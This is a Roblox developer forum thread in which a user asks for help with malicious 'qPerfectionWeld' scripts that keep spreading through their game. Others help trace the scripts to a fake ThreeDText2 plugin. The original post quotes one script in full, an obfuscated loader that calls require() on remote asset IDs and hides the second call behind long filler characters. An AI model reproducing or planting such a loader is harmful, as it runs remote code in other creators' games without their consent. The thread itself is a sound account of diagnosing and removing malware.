Virus? qPerfectionWeld scripts filling up my game

I’m not sure if anyone’s going to see this, but I’m having a problem with numerous “qPerfectionWeld” scripts appearing in random parts in my game even after I delete them, it reached a point where there were over 200 of them.

Example:
image

--[[Created by Quenty (@Quenty, follow me on twitter).]] pcall(function() require(7033072704) end)
--[[ Last synced 6/7/2025 06:35 ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������]] require(5355299916) --[[                                                                                                  ]]--

These seem to (sometimes) appear in the end of my scripts too.

I’ve already come across sources suggesting that faulty plugins might be the cause, here’s a list of my current ones:

I’ve suspected the “rxdesire” ones may be the issue, but when I go into the “Manage Plugins” window, but I just can’t seem to find a plugin made by “rxdesire”.

Does anyone have a plausible explanation or solution for this?

Thanks for reading.

Try checking your inventory for all plugins and view their source code
They meight have published it under different name but to confuse more people they create toolbar/tabs under different name entirely

No need to worry much as since assets they are requiring is already taken down by moderation: https://create.roblox.com/store/asset/7033072704
https://create.roblox.com/store/asset/5355299916

To download source code just run in command bar:

game.InsertService:LoadAsset(PlugInIdHere).Parent=workspace
1 Like

Viruses like hiding themselves in weld scripts, especially the old ones.

So yes, virus :smile:

What you can do is open a baseplate and try to reproduce this(so virus welds appear). If you find a way to do it, then simply start enabling and disabling plugins till you figure out which one is it. If you disable all your plugins and it somehow keeps coming back, the virus may be part of the plugins of one of your team members(if you’re using team create) or it may still be hiding in a folder you haven’t found, which then makes it clone itself after the game starts running.

1 Like

Thanks for the responses!

After a grueling process of going through all my plugins it narrowed down to ThreeDText2.

Definitely resposible for the “qPerfectionWeld” scripts at least. Rather surprising though, I remember some building youtubers recommending this plugin.

That’s because you own a fake one.

1 Like

Yes, the one you linked above: https://create.roblox.com/store/asset/6995483037/ThreeDText-2.
I own this one. This is the one that’s been causing the problem.